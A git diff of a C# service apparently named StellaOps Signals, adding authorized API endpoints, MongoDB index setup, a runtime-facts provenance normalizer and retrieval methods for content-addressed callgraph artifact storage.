- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(subjectKey))
- {
- return Results.BadRequest(new { error = "subjectKey is required." });
- }
-
- var fact = await factRepository.GetBySubjectAsync(subjectKey.Trim(), cancellationToken).ConfigureAwait(false);
- return fact is null ? Results.NotFound() : Results.Ok(fact);
-}).WithName("SignalsFactsGet");
-
-signalsGroup.MapPost("/unknowns", async Task (
- HttpContext context,
- SignalsOptions options,
- UnknownsIngestRequest request,
- IUnknownsIngestionService ingestionService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- try
- {
- var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
- return Results.Accepted($"/signals/unknowns/{response.SubjectKey}", response);
- }
- catch (UnknownsValidationException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
-}).WithName("SignalsUnknownsIngest");
-
-signalsGroup.MapGet("/unknowns/{subjectKey}", async Task (
- HttpContext context,
- SignalsOptions options,
- string subjectKey,
- IUnknownsRepository repository,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(subjectKey))
- {
- return Results.BadRequest(new { error = "subjectKey is required." });
- }
-
- var items = await repository.GetBySubjectAsync(subjectKey.Trim(), cancellationToken).ConfigureAwait(false);
- return items.Count == 0 ? Results.NotFound() : Results.Ok(items);
-}).WithName("SignalsUnknownsGet");
-
-signalsGroup.MapPost("/reachability/recompute", async Task (
- HttpContext context,
- SignalsOptions options,
- ReachabilityRecomputeRequest request,
- IReachabilityScoringService scoringService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Admin, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- try
- {
- var fact = await scoringService.RecomputeAsync(request, cancellationToken).ConfigureAwait(false);
- return Results.Ok(new
- {
- fact.Id,
- fact.CallgraphId,
- subject = fact.Subject,
- fact.EntryPoints,
- fact.States,
- fact.ComputedAt
- });
- }
- catch (ReachabilityScoringValidationException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
- catch (ReachabilityCallgraphNotFoundException ex)
- {
- return Results.NotFound(new { error = ex.Message });
- }
-}).WithName("SignalsReachabilityRecompute");
-
app.Run();
@@ -724,11 +753,11 @@ public partial class Program
return false;
}
- internal static void EnsureCallgraphIndexes(IMongoCollection collection)
- {
- ArgumentNullException.ThrowIfNull(collection);
-
- try
+ internal static void EnsureCallgraphIndexes(IMongoCollection collection)
+ {
+ ArgumentNullException.ThrowIfNull(collection);
+
+ try
{
var indexKeys = Builders.IndexKeys
.Ascending(document => document.Component)
@@ -745,78 +774,78 @@ public partial class Program
}
catch (MongoCommandException ex) when (string.Equals(ex.CodeName, "IndexOptionsConflict", StringComparison.Ordinal))
{
- // Index already exists with different options – ignore to keep startup idempotent.
- }
- }
-
- internal static void EnsureReachabilityFactIndexes(IMongoCollection collection)
- {
- ArgumentNullException.ThrowIfNull(collection);
-
- try
- {
- var subjectIndex = new CreateIndexModel(
- Builders.IndexKeys.Ascending(doc => doc.SubjectKey),
- new CreateIndexOptions { Name = "reachability_subject_key_unique", Unique = true });
-
- collection.Indexes.CreateOne(subjectIndex);
-
- var callgraphIndex = new CreateIndexModel(
- Builders.IndexKeys.Ascending(doc => doc.CallgraphId),
- new CreateIndexOptions { Name = "reachability_callgraph_lookup" });
-
- collection.Indexes.CreateOne(callgraphIndex);
- }
- catch (MongoCommandException ex) when (string.Equals(ex.CodeName, "IndexOptionsConflict", StringComparison.Ordinal))
- {
- // Ignore when indexes already exist with different options to keep startup idempotent.
- }
- }
-
- internal static bool TryEnsureSealedMode(SignalsSealedModeMonitor monitor, out IResult? failure)
- {
- if (!monitor.EnforcementEnabled)
- {
- failure = null;
- return true;
- }
-
- if (monitor.IsCompliant(out var reason))
- {
- failure = null;
- return true;
- }
-
- failure = Results.Json(
- new { error = "sealed-mode evidence invalid", reason },
- statusCode: StatusCodes.Status503ServiceUnavailable);
- return false;
- }
-
- internal static void EnsureUnknownsIndexes(IMongoCollection collection)
- {
- ArgumentNullException.ThrowIfNull(collection);
-
- try
- {
- var subjectIndex = new CreateIndexModel(
- Builders.IndexKeys.Ascending(doc => doc.SubjectKey),
- new CreateIndexOptions { Name = "unknowns_subject_lookup" });
-
- var dedupeIndex = new CreateIndexModel(
- Builders.IndexKeys
- .Ascending(doc => doc.SubjectKey)
- .Ascending(doc => doc.SymbolId)
- .Ascending(doc => doc.Purl)
- .Ascending(doc => doc.EdgeFrom)
- .Ascending(doc => doc.EdgeTo),
- new CreateIndexOptions { Name = "unknowns_subject_symbol_edge_unique", Unique = true });
-
- collection.Indexes.CreateMany(new[] { subjectIndex, dedupeIndex });
- }
- catch (MongoCommandException ex) when (string.Equals(ex.CodeName, "IndexOptionsConflict", StringComparison.Ordinal))
- {
- // Ignore to keep startup idempotent when index options differ.
- }
- }
-}
+ // Index already exists with different options – ignore to keep startup idempotent.
+ }
+ }
+
+ internal static void EnsureReachabilityFactIndexes(IMongoCollection collection)
+ {
+ ArgumentNullException.ThrowIfNull(collection);
+
+ try
+ {
+ var subjectIndex = new CreateIndexModel(
+ Builders.IndexKeys.Ascending(doc => doc.SubjectKey),
+ new CreateIndexOptions { Name = "reachability_subject_key_unique", Unique = true });
+
+ collection.Indexes.CreateOne(subjectIndex);
+
+ var callgraphIndex = new CreateIndexModel(
+ Builders.IndexKeys.Ascending(doc => doc.CallgraphId),
+ new CreateIndexOptions { Name = "reachability_callgraph_lookup" });
+
+ collection.Indexes.CreateOne(callgraphIndex);
+ }
+ catch (MongoCommandException ex) when (string.Equals(ex.CodeName, "IndexOptionsConflict", StringComparison.Ordinal))
+ {
+ // Ignore when indexes already exist with different options to keep startup idempotent.
+ }
+ }
+
+ internal static bool TryEnsureSealedMode(SignalsSealedModeMonitor monitor, out IResult? failure)
+ {
+ if (!monitor.EnforcementEnabled)
+ {
+ failure = null;
+ return true;
+ }
+
+ if (monitor.IsCompliant(out var reason))
+ {
+ failure = null;
+ return true;
+ }
+
+ failure = Results.Json(
+ new { error = "sealed-mode evidence invalid", reason },
+ statusCode: StatusCodes.Status503ServiceUnavailable);
+ return false;
+ }
+
+ internal static void EnsureUnknownsIndexes(IMongoCollection collection)
+ {
+ ArgumentNullException.ThrowIfNull(collection);
+
+ try
+ {
+ var subjectIndex = new CreateIndexModel(
+ Builders.IndexKeys.Ascending(doc => doc.SubjectKey),
+ new CreateIndexOptions { Name = "unknowns_subject_lookup" });
+
+ var dedupeIndex = new CreateIndexModel(
+ Builders.IndexKeys
+ .Ascending(doc => doc.SubjectKey)
+ .Ascending(doc => doc.SymbolId)
+ .Ascending(doc => doc.Purl)
+ .Ascending(doc => doc.EdgeFrom)
+ .Ascending(doc => doc.EdgeTo),
+ new CreateIndexOptions { Name = "unknowns_subject_symbol_edge_unique", Unique = true });
+
+ collection.Indexes.CreateMany(new[] { subjectIndex, dedupeIndex });
+ }
+ catch (MongoCommandException ex) when (string.Equals(ex.CodeName, "IndexOptionsConflict", StringComparison.Ordinal))
+ {
+ // Ignore to keep startup idempotent when index options differ.
+ }
+ }
+}
diff --git a/src/Signals/StellaOps.Signals/Services/RuntimeFactsIngestionService.cs b/src/Signals/StellaOps.Signals/Services/RuntimeFactsIngestionService.cs
index 6e5dd0b32..6f992b25c 100644
--- a/src/Signals/StellaOps.Signals/Services/RuntimeFactsIngestionService.cs
+++ b/src/Signals/StellaOps.Signals/Services/RuntimeFactsIngestionService.cs
@@ -17,6 +17,7 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
private readonly IReachabilityCache cache;
private readonly IEventsPublisher eventsPublisher;
private readonly IReachabilityScoringService scoringService;
+ private readonly IRuntimeFactsProvenanceNormalizer provenanceNormalizer;
private readonly ILogger logger;
public RuntimeFactsIngestionService(
@@ -25,6 +26,7 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
IReachabilityCache cache,
IEventsPublisher eventsPublisher,
IReachabilityScoringService scoringService,
+ IRuntimeFactsProvenanceNormalizer provenanceNormalizer,
ILogger logger)
{
this.factRepository = factRepository ?? throw new ArgumentNullException(nameof(factRepository));
@@ -32,6 +34,7 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
this.cache = cache ?? throw new ArgumentNullException(nameof(cache));
this.eventsPublisher = eventsPublisher ?? throw new ArgumentNullException(nameof(eventsPublisher));
this.scoringService = scoringService ?? throw new ArgumentNullException(nameof(scoringService));
+ this.provenanceNormalizer = provenanceNormalizer ?? throw new ArgumentNullException(nameof(provenanceNormalizer));
this.logger = logger ?? NullLogger.Instance;
}
@@ -62,6 +65,14 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
document.Metadata["provenance.ingestedAt"] = document.ComputedAt.ToString("O");
document.Metadata["provenance.callgraphId"] = request.CallgraphId;
+ // Populate context_facts with AOC provenance (SIGNALS-24-003)
+ document.ContextFacts = provenanceNormalizer.CreateContextFacts(
+ request.Events,
+ request.Subject,
+ request.CallgraphId,
+ request.Metadata,
+ document.ComputedAt);
+
var persisted = await factRepository.UpsertAsync(document, cancellationToken).ConfigureAwait(false);
await cache.SetAsync(persisted, cancellationToken).ConfigureAwait(false);
await eventsPublisher.PublishFactUpdatedAsync(persisted, cancellationToken).ConfigureAwait(false);
diff --git a/src/Signals/StellaOps.Signals/Services/RuntimeFactsProvenanceNormalizer.cs b/src/Signals/StellaOps.Signals/Services/RuntimeFactsProvenanceNormalizer.cs
new file mode 100644
index 000000000..926b2cd4d
--- /dev/null
+++ b/src/Signals/StellaOps.Signals/Services/RuntimeFactsProvenanceNormalizer.cs
@@ -0,0 +1,385 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using StellaOps.Signals.Models;
+
+namespace StellaOps.Signals.Services;
+
+///
+/// Normalizes runtime fact events into AOC provenance records per SIGNALS-24-003.
+/// Converts process, socket, and container metadata to format.
+///
+public interface IRuntimeFactsProvenanceNormalizer
+{
+ ///
+ /// Normalizes runtime fact events into a provenance feed.
+ ///
+ ProvenanceFeed NormalizeToFeed(
+ IEnumerable<RuntimeFactEvent> events,
+ ReachabilitySubject subject,
+ string callgraphId,
+ Dictionary<string, string>? metadata,
+ DateTimeOffset generatedAt);
+
+ ///
+ /// Creates or updates context facts from runtime events.
+ ///
+ ContextFacts CreateContextFacts(
+ IEnumerable<RuntimeFactEvent> events,
+ ReachabilitySubject subject,
+ string callgraphId,
+ Dictionary<string, string>? metadata,
+ DateTimeOffset timestamp);
+}
+
+///
+/// Default implementation of runtime facts provenance normalizer.
+///
+public sealed class RuntimeFactsProvenanceNormalizer : IRuntimeFactsProvenanceNormalizer
+{
+ private const string SourceService = "signals-runtime-ingestion";
+ private const double DefaultConfidence = 0.95;
+
+ public ProvenanceFeed NormalizeToFeed(
+ IEnumerable<RuntimeFactEvent> events,
+ ReachabilitySubject subject,
+ string callgraphId,
+ Dictionary<string, string>? metadata,
+ DateTimeOffset generatedAt)
+ {
+ ArgumentNullException.ThrowIfNull(events);
+ ArgumentNullException.ThrowIfNull(subject);
+
+ var eventsList = events.Where(e => e is not null && !string.IsNullOrWhiteSpace(e.SymbolId)).ToList();
+ var records = new List<ProvenanceRecord>(eventsList.Count);
+
+ foreach (var evt in eventsList)
+ {
+ var record = NormalizeEvent(evt, subject, callgraphId, generatedAt);
+ if (record is not null)
+ {
+ records.Add(record);
+ }
+ }
+
+ var feedMetadata = new Dictionary<string, string>(StringComparer.Ordinal)
+ {
+ ["aoc.version"] = "1",
+ ["aoc.contract"] = "SGSI0101",
+ ["callgraphId"] = callgraphId,
+ ["subjectKey"] = subject.ToSubjectKey()
+ };
+
+ if (metadata is not null)
+ {
+ foreach (var (key, value) in metadata)
+ {
+ feedMetadata[$"request.{key}"] = value;
+ }
+ }
+
+ return new ProvenanceFeed
+ {
+ SchemaVersion = ProvenanceFeed.CurrentSchemaVersion,
+ FeedId = Guid.NewGuid().ToString("D"),
+ FeedType = ProvenanceFeedType.RuntimeFacts,
+ GeneratedAt = generatedAt,
+ SourceService = SourceService,
+ CorrelationId = callgraphId,
+ Records = records,
+ Metadata = feedMetadata
+ };
+ }
+
+ public ContextFacts CreateContextFacts(
+ IEnumerable<RuntimeFactEvent> events,
+ ReachabilitySubject subject,
+ string callgraphId,
+ Dictionary<string, string>? metadata,
+ DateTimeOffset timestamp)
+ {
+ var feed = NormalizeToFeed(events, subject, callgraphId, metadata, timestamp);
+
+ return new ContextFacts
+ {
+ Provenance = feed,
+ LastUpdatedAt = timestamp,
+ RecordCount = feed.Records.Count
+ };
+ }
+
+ private static ProvenanceRecord? NormalizeEvent(
+ RuntimeFactEvent evt,
+ ReachabilitySubject subject,
+ string callgraphId,
+ DateTimeOffset generatedAt)
+ {
+ if (string.IsNullOrWhiteSpace(evt.SymbolId))
+ {
+ return null;
+ }
+
+ var recordType = DetermineRecordType(evt);
+ var subjectType = DetermineSubjectType(evt, subject);
+
+ var provenanceSubject = new ProvenanceSubject
+ {
+ Type = subjectType,
+ Identifier = BuildSubjectIdentifier(evt, subject),
+ Digest = NormalizeDigest(evt.SymbolDigest),
+ Namespace = ExtractNamespace(evt.ContainerId, subject)
+ };
+
+ var facts = new RuntimeProvenanceFacts
+ {
+ SymbolId = evt.SymbolId.Trim(),
+ ProcessName = Normalize(evt.ProcessName),
+ ProcessId = evt.ProcessId,
+ SocketAddress = Normalize(evt.SocketAddress),
+ ContainerId = Normalize(evt.ContainerId),
+ HitCount = Math.Max(evt.HitCount, 1),
+ Purl = Normalize(evt.Purl),
+ CodeId = Normalize(evt.CodeId),
+ BuildId = Normalize(evt.BuildId),
+ LoaderBase = Normalize(evt.LoaderBase),
+ Metadata = evt.Metadata
+ };
+
+ var evidence = BuildEvidence(evt);
+
+ return new ProvenanceRecord
+ {
+ RecordId = Guid.NewGuid().ToString("D"),
+ RecordType = recordType,
+ Subject = provenanceSubject,
+ OccurredAt = evt.ObservedAt ?? generatedAt,
+ ObservedBy = DetermineObserver(evt),
+ Confidence = ComputeConfidence(evt),
+ Facts = facts,
+ Evidence = evidence
+ };
+ }
+
+ private static string DetermineRecordType(RuntimeFactEvent evt)
+ {
+ // Determine record type based on available metadata
+ if (!string.IsNullOrWhiteSpace(evt.ProcessName) || evt.ProcessId.HasValue)
+ {
+ return "runtime.process.observed";
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.SocketAddress))
+ {
+ return "runtime.network.connection";
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.ContainerId))
+ {
+ return "runtime.container.activity";
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.Purl))
+ {
+ return "runtime.package.loaded";
+ }
+
+ return "runtime.symbol.invoked";
+ }
+
+ private static ProvenanceSubjectType DetermineSubjectType(RuntimeFactEvent evt, ReachabilitySubject subject)
+ {
+ // Priority: container > process > package > file
+ if (!string.IsNullOrWhiteSpace(evt.ContainerId))
+ {
+ return ProvenanceSubjectType.Container;
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.ProcessName) || evt.ProcessId.HasValue)
+ {
+ return ProvenanceSubjectType.Process;
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.Purl))
+ {
+ return ProvenanceSubjectType.Package;
+ }
+
+ if (!string.IsNullOrWhiteSpace(subject.ImageDigest))
+ {
+ return ProvenanceSubjectType.Image;
+ }
+
+ return ProvenanceSubjectType.Package;
+ }
+
+ private static string BuildSubjectIdentifier(RuntimeFactEvent evt, ReachabilitySubject subject)
+ {
+ // Build identifier based on available data
+ if (!string.IsNullOrWhiteSpace(evt.Purl))
+ {
+ return evt.Purl.Trim();
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.ContainerId))
+ {
+ return evt.ContainerId.Trim();
+ }
+
+ if (!string.IsNullOrWhiteSpace(subject.ImageDigest))
+ {
+ return subject.ImageDigest;
+ }
+
+ if (!string.IsNullOrWhiteSpace(subject.Component))
+ {
+ return string.IsNullOrWhiteSpace(subject.Version)
+ ? subject.Component
+ : $"{subject.Component}@{subject.Version}";
+ }
+
+ return evt.SymbolId.Trim();
+ }
+
+ private static string? NormalizeDigest(string? digest)
+ {
+ if (string.IsNullOrWhiteSpace(digest))
+ {
+ return null;
+ }
+
+ var trimmed = digest.Trim();
+
+ // Ensure sha256: prefix for valid hex digests
+ if (trimmed.StartsWith("sha256:", StringComparison.OrdinalIgnoreCase))
+ {
+ return trimmed.ToLowerInvariant();
+ }
+
+ // If it looks like a hex digest (64 chars), add prefix
+ if (trimmed.Length == 64 && IsHexString(trimmed))
+ {
+ return $"sha256:{trimmed.ToLowerInvariant()}";
+ }
+
+ return trimmed;
+ }
+
+ private static bool IsHexString(string value)
+ {
+ foreach (var c in value)
+ {
+ if (!((c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') || (c >= 'A' && c <= 'F')))
+ {
+ return false;
+ }
+ }
+ return true;
+ }
+
+ private static string? ExtractNamespace(string? containerId, ReachabilitySubject subject)
+ {
+ // Try to extract namespace from container ID or subject metadata
+ if (!string.IsNullOrWhiteSpace(containerId) && containerId.Contains('/'))
+ {
+ var parts = containerId.Split('/');
+ if (parts.Length > 1)
+ {
+ return parts[0];
+ }
+ }
+
+ return null;
+ }
+
+ private static RecordEvidence? BuildEvidence(RuntimeFactEvent evt)
+ {
+ if (string.IsNullOrWhiteSpace(evt.EvidenceUri) && string.IsNullOrWhiteSpace(evt.SymbolDigest))
+ {
+ return null;
+ }
+
+ var captureMethod = DetermineCaptureMethod(evt);
+
+ return new RecordEvidence
+ {
+ SourceDigest = NormalizeDigest(evt.SymbolDigest),
+ CaptureMethod = captureMethod,
+ RawDataRef = Normalize(evt.EvidenceUri)
+ };
+ }
+
+ private static EvidenceCaptureMethod? DetermineCaptureMethod(RuntimeFactEvent evt)
+ {
+ // Infer capture method from event metadata
+ if (evt.Metadata is not null)
+ {
+ if (evt.Metadata.TryGetValue("captureMethod", out var method) && !string.IsNullOrWhiteSpace(method))
+ {
+ return method.ToUpperInvariant() switch
+ {
+ "EBPF" => EvidenceCaptureMethod.EBpf,
+ "PROC_SCAN" => EvidenceCaptureMethod.ProcScan,
+ "API_CALL" => EvidenceCaptureMethod.ApiCall,
+ "LOG_ANALYSIS" => EvidenceCaptureMethod.LogAnalysis,
+ "STATIC_ANALYSIS" => EvidenceCaptureMethod.StaticAnalysis,
+ _ => null
+ };
+ }
+ }
+
+ // Default based on available data
+ if (evt.ProcessId.HasValue || !string.IsNullOrWhiteSpace(evt.ProcessName))
+ {
+ return EvidenceCaptureMethod.ProcScan;
+ }
+
+ return EvidenceCaptureMethod.ApiCall;
+ }
+
+ private static string? DetermineObserver(RuntimeFactEvent evt)
+ {
+ if (evt.Metadata is not null && evt.Metadata.TryGetValue("observer", out var observer))
+ {
+ return Normalize(observer);
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.ContainerId))
+ {
+ return "container-runtime-agent";
+ }
+
+ if (evt.ProcessId.HasValue)
+ {
+ return "process-monitor-agent";
+ }
+
+ return "signals-ingestion";
+ }
+
+ private static double ComputeConfidence(RuntimeFactEvent evt)
+ {
+ // Base confidence
+ var confidence = DefaultConfidence;
+
+ // Adjust based on available evidence
+ if (!string.IsNullOrWhiteSpace(evt.SymbolDigest))
+ {
+ confidence = Math.Min(confidence + 0.02, 1.0);
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.EvidenceUri))
+ {
+ confidence = Math.Min(confidence + 0.01, 1.0);
+ }
+
+ if (evt.ProcessId.HasValue && !string.IsNullOrWhiteSpace(evt.ProcessName))
+ {
+ confidence = Math.Min(confidence + 0.01, 1.0);
+ }
+
+ return Math.Round(confidence, 2);
+ }
+
+ private static string? Normalize(string? value) =>
+ string.IsNullOrWhiteSpace(value) ? null : value.Trim();
+}
diff --git a/src/Signals/StellaOps.Signals/Storage/FileSystemCallgraphArtifactStore.cs b/src/Signals/StellaOps.Signals/Storage/FileSystemCallgraphArtifactStore.cs
index 0d00b2aca..a626a36e3 100644
--- a/src/Signals/StellaOps.Signals/Storage/FileSystemCallgraphArtifactStore.cs
+++ b/src/Signals/StellaOps.Signals/Storage/FileSystemCallgraphArtifactStore.cs
@@ -1,46 +1,48 @@
-using System;
-using System.Globalization;
-using System.IO;
-using System.Threading;
-using System.Threading.Tasks;
-using Microsoft.Extensions.Logging;
-using Microsoft.Extensions.Options;
-using StellaOps.Signals.Options;
-using StellaOps.Signals.Storage.Models;
-
-namespace StellaOps.Signals.Storage;
-
-///
-/// Stores callgraph artifacts on the local filesystem.
-///
-internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
-{
- private readonly SignalsArtifactStorageOptions storageOptions;
- private readonly ILogger logger;
-
- public FileSystemCallgraphArtifactStore(IOptions options, ILogger logger)
- {
- ArgumentNullException.ThrowIfNull(options);
- storageOptions = options.Value.Storage;
- this.logger = logger ?? throw new ArgumentNullException(nameof(logger));
- }
-
+using System;
+using System.IO;
+using System.Threading;
+using System.Threading.Tasks;
+using Microsoft.Extensions.Logging;
+using Microsoft.Extensions.Options;
+using StellaOps.Signals.Options;
+using StellaOps.Signals.Storage.Models;
+
+namespace StellaOps.Signals.Storage;
+
+///
+/// Stores callgraph artifacts on the local filesystem.
+///
+internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
+{
+ private const string DefaultFileName = "callgraph.json";
+ private const string ManifestFileName = "manifest.json";
+
+ private readonly SignalsArtifactStorageOptions _storageOptions;
+ private readonly ILogger _logger;
+
+ public FileSystemCallgraphArtifactStore(IOptions<SignalsOptions> options, ILogger<FileSystemCallgraphArtifactStore> logger)
+ {
+ ArgumentNullException.ThrowIfNull(options);
+ _storageOptions = options.Value.Storage;
+ _logger = logger ?? throw new ArgumentNullException(nameof(logger));
+ }
+
public async Task SaveAsync(CallgraphArtifactSaveRequest request, Stream content, CancellationToken cancellationToken)
{
ArgumentNullException.ThrowIfNull(request);
ArgumentNullException.ThrowIfNull(content);
- var root = storageOptions.RootPath;
- var hash = request.Hash?.Trim().ToLowerInvariant();
+ var root = _storageOptions.RootPath;
+ var hash = NormalizeHash(request.Hash);
if (string.IsNullOrWhiteSpace(hash))
{
throw new InvalidOperationException("Callgraph artifact hash is required for CAS storage.");
}
- var casDirectory = Path.Combine(root, "cas", "reachability", "graphs", hash.Substring(0, Math.Min(hash.Length, 2)), hash);
+ var casDirectory = GetCasDirectory(hash);
Directory.CreateDirectory(casDirectory);
- var fileName = SanitizeFileName(string.IsNullOrWhiteSpace(request.FileName) ? "callgraph.json" : request.FileName);
+ var fileName = SanitizeFileName(string.IsNullOrWhiteSpace(request.FileName) ? DefaultFileName : request.FileName);
var destinationPath = Path.Combine(casDirectory, fileName);
await using (var fileStream = File.Create(destinationPath))
@@ -48,7 +50,7 @@ internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
await content.CopyToAsync(fileStream, cancellationToken).ConfigureAwait(false);
}
- var manifestPath = Path.Combine(casDirectory, "manifest.json");
+ var manifestPath = Path.Combine(casDirectory, ManifestFileName);
if (request.ManifestContent != null)
{
await using var manifestStream = File.Create(manifestPath);
@@ -61,7 +63,7 @@ internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
}
var fileInfo = new FileInfo(destinationPath);
- logger.LogInformation("Stored callgraph artifact at {Path} (length={Length}).", destinationPath, fileInfo.Length);
+ _logger.LogInformation("Stored callgraph artifact at {Path} (length={Length}).", destinationPath, fileInfo.Length);
return new StoredCallgraphArtifact(
Path.GetRelativePath(root, destinationPath),
@@ -73,6 +75,88 @@ internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
$"cas://reachability/graphs/{hash}/manifest");
}
+ public Task<Stream?> GetAsync(string hash, string? fileName = null, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return Task.FromResult<Stream?>(null);
+ }
+
+ var casDirectory = GetCasDirectory(normalizedHash);
+ var targetFileName = SanitizeFileName(string.IsNullOrWhiteSpace(fileName) ? DefaultFileName : fileName);
+ var filePath = Path.Combine(casDirectory, targetFileName);
+
+ if (!File.Exists(filePath))
+ {
+ _logger.LogDebug("Callgraph artifact {Hash}/{FileName} not found at {Path}.", normalizedHash, targetFileName, filePath);
+ return Task.FromResult(null);
+ }
+
+ var content = new MemoryStream();
+ using (var fileStream = File.OpenRead(filePath))
+ {
+ fileStream.CopyTo(content);
+ }
+
+ content.Position = 0;
+ _logger.LogDebug("Retrieved callgraph artifact {Hash}/{FileName} from {Path}.", normalizedHash, targetFileName, filePath);
+ return Task.FromResult<Stream?>(content);
+ }
+
+ public Task<Stream?> GetManifestAsync(string hash, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return Task.FromResult<Stream?>(null);
+ }
+
+ var casDirectory = GetCasDirectory(normalizedHash);
+ var manifestPath = Path.Combine(casDirectory, ManifestFileName);
+
+ if (!File.Exists(manifestPath))
+ {
+ _logger.LogDebug("Callgraph manifest for {Hash} not found at {Path}.", normalizedHash, manifestPath);
+ return Task.FromResult(null);
+ }
+
+ var content = new MemoryStream();
+ using (var fileStream = File.OpenRead(manifestPath))
+ {
+ fileStream.CopyTo(content);
+ }
+
+ content.Position = 0;
+ _logger.LogDebug("Retrieved callgraph manifest for {Hash} from {Path}.", normalizedHash, manifestPath);
+ return Task.FromResult<Stream?>(content);
+ }
+
+ public Task<bool> ExistsAsync(string hash, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return Task.FromResult(false);
+ }
+
+ var casDirectory = GetCasDirectory(normalizedHash);
+ var defaultPath = Path.Combine(casDirectory, DefaultFileName);
+ var exists = File.Exists(defaultPath);
+
+ _logger.LogDebug("Callgraph artifact {Hash} exists={Exists} at {Path}.", normalizedHash, exists, defaultPath);
+ return Task.FromResult(exists);
+ }
+
+ private string GetCasDirectory(string hash)
+ {
+ var prefix = hash.Length >= 2 ? hash[..2] : hash;
+ return Path.Combine(_storageOptions.RootPath, "cas", "reachability", "graphs", prefix, hash);
+ }
+
+ private static string? NormalizeHash(string? hash)
+ => hash?.Trim().ToLowerInvariant();
+
private static string SanitizeFileName(string value)
=> string.Join('_', value.Split(Path.GetInvalidFileNameChars(), StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries)).ToLowerInvariant();
}
diff --git a/src/Signals/StellaOps.Signals/Storage/ICallgraphArtifactStore.cs b/src/Signals/StellaOps.Signals/Storage/ICallgraphArtifactStore.cs
index d38c24239..54596112b 100644
--- a/src/Signals/StellaOps.Signals/Storage/ICallgraphArtifactStore.cs
+++ b/src/Signals/StellaOps.Signals/Storage/ICallgraphArtifactStore.cs
@@ -6,9 +6,41 @@ using StellaOps.Signals.Storage.Models;
namespace StellaOps.Signals.Storage;
///
-/// Persists raw callgraph artifacts.
+/// Persists and retrieves raw callgraph artifacts from content-addressable storage.
///
public interface ICallgraphArtifactStore
{
+ ///
+ /// Stores a callgraph artifact.
+ ///
+ /// Metadata about the artifact to store.
+ /// The artifact content stream.
+ /// Cancellation token.
+ /// Information about the stored artifact.
 Task<StoredCallgraphArtifact> SaveAsync(CallgraphArtifactSaveRequest request, Stream content, CancellationToken cancellationToken);
+
+ ///
+ /// Retrieves a callgraph artifact by its hash.
+ ///
+ /// The SHA-256 hash of the artifact.
+ /// Optional file name (defaults to callgraph.json).
+ /// Cancellation token.
+ /// The artifact content stream, or null if not found.
+ Task<Stream?> GetAsync(string hash, string? fileName = null, CancellationToken cancellationToken = default);
+
+ ///
+ /// Retrieves a callgraph manifest by artifact hash.
+ ///
+ /// The SHA-256 hash of the artifact.
+ /// Cancellation token.
+ /// The manifest content stream, or null if not found.
+ Task<Stream?> GetManifestAsync(string hash, CancellationToken cancellationToken = default);
+
+ ///
+ /// Checks if an artifact exists.
+ ///
+ /// The SHA-256 hash of the artifact.
+ /// Cancellation token.
+ /// True if the artifact exists.
+ Task<bool> ExistsAsync(string hash, CancellationToken cancellationToken = default);
}
diff --git a/src/Signals/StellaOps.Signals/Storage/RustFsCallgraphArtifactStore.cs b/src/Signals/StellaOps.Signals/Storage/RustFsCallgraphArtifactStore.cs
new file mode 100644
index 000000000..97ae429fc
--- /dev/null
+++ b/src/Signals/StellaOps.Signals/Storage/RustFsCallgraphArtifactStore.cs
@@ -0,0 +1,333 @@
+using System;
+using System.Globalization;
+using System.IO;
+using System.Linq;
